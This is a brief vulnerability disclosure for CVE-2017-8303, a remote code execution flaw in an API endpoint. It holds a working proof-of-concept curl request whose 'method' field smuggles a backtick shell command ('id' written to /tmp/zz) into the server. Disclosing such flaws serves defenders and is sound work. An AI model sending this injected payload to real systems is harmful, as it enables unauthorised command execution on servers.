RCE: CVE-2017-8303
> curl -i '/find.api' --data "method=x%27%60id>/tmp/zz%60%27&oauth_token=b"
> -H 'Content-type: application/x-www-form-urlencoded'
>
> This payload executes "id >/tmp/zz".
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Code Execution